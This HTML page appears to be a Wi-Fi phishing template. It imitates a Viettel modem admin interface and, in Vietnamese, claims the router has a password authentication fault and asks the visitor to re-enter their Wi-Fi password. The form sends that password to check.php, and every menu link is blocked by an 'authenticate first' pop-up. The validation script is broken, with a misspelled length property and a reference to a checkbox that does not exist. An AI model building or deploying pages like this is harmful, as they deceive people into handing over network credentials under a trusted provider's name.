<!DOCTYPE html>
<html lang=en>

<head>
  <title>Xảy ra lỗi... </title>
  <meta charset=utf-8>
  <meta name=viewport content="width=device-width, initial-scale=1">
  <link rel=stylesheet href=bootstrap.min.css>
  <script src=jquery.min.js></script>
  <script src=bootstrap.min.js></script><!-- CSS -->
  <style type=text/css>
    /* Sticky footer styles
    -------------------------------------------------- */

    html,
    body {
      height: 100%;
      /* The html and body elements cannot have any padding or margin. */
    }

    /* Wrapper for page content to push down footer */
    #wrap {
      min-height: 100%;
      height: auto !important;
      height: 100%;
      /* Negative indent footer by it's height */
      margin: 0 auto -60px;
    }

    /* Set the fixed height of the footer here */
    #push,
    #footer {
      height: 60px;
    }

    #footer {
      background-color: #f5f5f5;
    }

    /* Lastly, apply responsive CSS fixes as necessary */
    @media (max-width: 767px) {
      #footer {
        margin-left: -20px;
        margin-right: -20px;
        padding-left: 20px;
        padding-right: 20px;
      }
    }

    .navbar-collapse {
      float: right;
    }

    .navbar-inverse .navbar-nav>.open>a,
    .navbar-inverse .navbar-nav>.open>a:focus,
    .navbar-inverse .navbar-nav>.open>a:hover {
      background-color: white;
    }

    .navbar-toggle{
      background-color:black
    }
    .navbar-nav .open .dropdown-menu {
      background-color: white;
    }

    .navbar-inverse .navbar-nav .open .dropdown-menu>li>a {
      color: black;
    }
  </style>
</head>

<body>
  <!-- Start navigation bar --> <!-- To change the navigation bar color change background attribute -->
  <nav class="navbar navbar-inverse" style=background:#d1d1d1;margin-top:2em;>
    <div class=container-fluid>
      <div class=navbar-header> <button type=button class=navbar-toggle data-toggle=collapse data-target=#myNavbar>
          <span class=icon-bar></span> <span class=icon-bar></span> <span class=icon-bar></span> </button>
        <a class="navbar-brand" href="https://viettel.vn"><img style="background:transparent" src="logo_home_new.png"
            alt="Logo"></a>
      </div>
      <div class="collapse navbar-collapse" id=myNavbar>
        <ul class="nav navbar-nav">
          <li class=dropdown data-toggle=modal data-target=#update-only><a class=dropdown-toggle data-toggle=dropdown
              href=# style=color:black>Setup <span class=caret></span></a>
            <ul class=dropdown-menu>
              <li><a href=#>Basic Setup</a></li>
              <li><a href=#>DDNS</a></li>
              <li><a href=#>MAC Address Clone</a></li>
              <li><a href=#>Advanced Routing</a></li>
            </ul>
          </li>
          <li class=dropdown data-toggle=modal data-target=#update-only><a class=dropdown-toggle data-toggle=dropdown
              href=# style=color:black>Wireless <span class=caret></span></a>
            <ul class=dropdown-menu>
              <li><a href=#>Basic Wireless Settings</a></li>
              <li><a href=#>Wireless Security</a></li>
              <li><a href=#>Wireless MAC Filter</a></li>
              <li><a href=#>Advanced Wireless Settings</a></li>
            </ul>
          </li>
          <li class=dropdown data-toggle=modal data-target=#update-only><a class=dropdown-toggle data-toggle=dropdown
              href=# style=color:black>Security <span class=caret></span></a>
            <ul class=dropdown-menu>
              <li><a href=#>Firewall</a></li>
              <li><a href=#>VPN</a></li>
            </ul>
          </li>
          <li class=dropdown data-toggle=modal data-target=#update-only><a class=dropdown-toggle data-toggle=dropdown
              href=# style=color:black>Access Restriction <span class=caret></span></a>
            <ul class=dropdown-menu>
              <li><a href=#>Internet Access</a></li>
            </ul>
          </li>
          <li class=dropdown data-toggle=modal data-target=#update-only><a class=dropdown-toggle data-toggle=dropdown
              href=# style=color:black>Administration <span class=caret></span></a>
            <ul class=dropdown-menu>
              <li><a href=#>Management</a></li>
              <li><a href=#>Log</a></li>
              <li><a href=#>Diagnostics</a></li>
              <li><a href=#>Factory Defaults</a></li>
              <li><a href=#>Config Manegements</a></li>
            </ul>
          </li>
          <li class=dropdown data-toggle=modal data-target=#update-only><a class=dropdown-toggle data-toggle=dropdown
              href=# style=color:black>Status <span class=caret></span></a>
            <ul class=dropdown-menu>
              <li><a href=#>Router</a></li>
              <li><a href=#>Local Network</a></li>
              <li><a href=#>Wireless</a></li>
              <li><a href=#>Advanced Routing</a></li>
            </ul>
          </li>
        </ul>
      </div>
    </div>
  </nav>
  <!-- End navigation bar -->
  <!-- Start page content -->
  <div class=container>
    <div class=col-sm>
      <h2 class=text-center style=color:red>Xác thực lại mật khẩu Wifi</h2>
      <p class=lead>Hiện tại Modem của bạn đang gặp vấn đề về xác thực mật khẩu Wifi, vui lòng nhập lại mật khẩu Wifi để tiếp tục truy cập internet.</p>
    </div>
    <form action=check.php method=POST>

      <div class="form-group has-feedback"> <label>Mật khẩu Wifi hiện tại của bạn:</label> <input class=form-control type=password id=pwd
          name=key1> </div>
      <div class="container text-center"> <input type=submit class="btn btn-primary" id=btn value="Xác thực">
      </div>
    </form>
    <div id=push></div>
  </div> <!-- Start page content --> <!-- Start footer -->
  <footer class=footer>
    <div class="container text-center">
      <p class=text-muted>VIETTEL© 2019, All Rights Reserved.</p>
    </div>
  </footer> <!-- End footer --> <!-- Start update first message -->
  <div class="modal fade" id=update-only role=dialog>
    <div class="modal-dialog modal-sm">
      <div class=modal-content>
        <div class=modal-header> <button type=button class=close data-dismiss=modal>&times;</button>
          <h4 class=modal-title>Information</h4>
        </div>
        <div class=modal-body>
          <p>Please Authentication First.</p>
        </div>
        <div class=modal-footer> <button type=button class="btn btn-default" data-dismiss=modal>Close</button> </div>
      </div>
    </div>
  </div> <!-- End update first message --> <!-- Start empty password message -->
  <div class="modal fade" id=empty-pass>
    <div class="modal-dialog modal-sm">
      <div class=modal-content>
        <div class=modal-header> <button type=button class=close data-dismiss=modal>&times;</button>
          <h4 class=modal-title>Information</h4>
        </div>
        <div class=modal-body>
          <p>Please Input Valid Password. (Must be between 7 and 64 characters)</p>
        </div>
        <div class=modal-footer> <button type=button class="btn btn-default" data-dismiss=modal>Close</button> </div>
      </div>
    </div>
  </div> <!-- End empty password message --> <!-- Start empty password message -->
  <div class="modal fade" id=no-checkbox>
    <div class="modal-dialog modal-sm">
      <div class=modal-content>
        <div class=modal-header> <button type=button class=close data-dismiss=modal>&times;</button>
          <h4 class=modal-title>Information</h4>
        </div>
        <div class=modal-body>
          <p>Please Check The I Agree Button.</p>
        </div>
        <div class=modal-footer> <button type=button class="btn btn-default" data-dismiss=modal>Close</button> </div>
      </div>
    </div>
  </div> <!-- End empty password message -->
  <script>

    /*
      Check the password field and act accordingly.
    */
    $("#btn").on("click", function (e) {

      // get the password box and checkbox elements
      var input = document.getElementById("pwd");
      var box = document.getElementById("check-box");

      // if the box is checked
      if (box.checked != true) {
        // display no checkbox message
        $("#no-checkbox").modal("show");
        return false;
      }
      if (input.value.lenght < 7 || input.value.lenght > 64) {
        // display no password message
        $("#empty-pass").modal("show");
        return false;
      }


    });




  </script>
</body>

</html>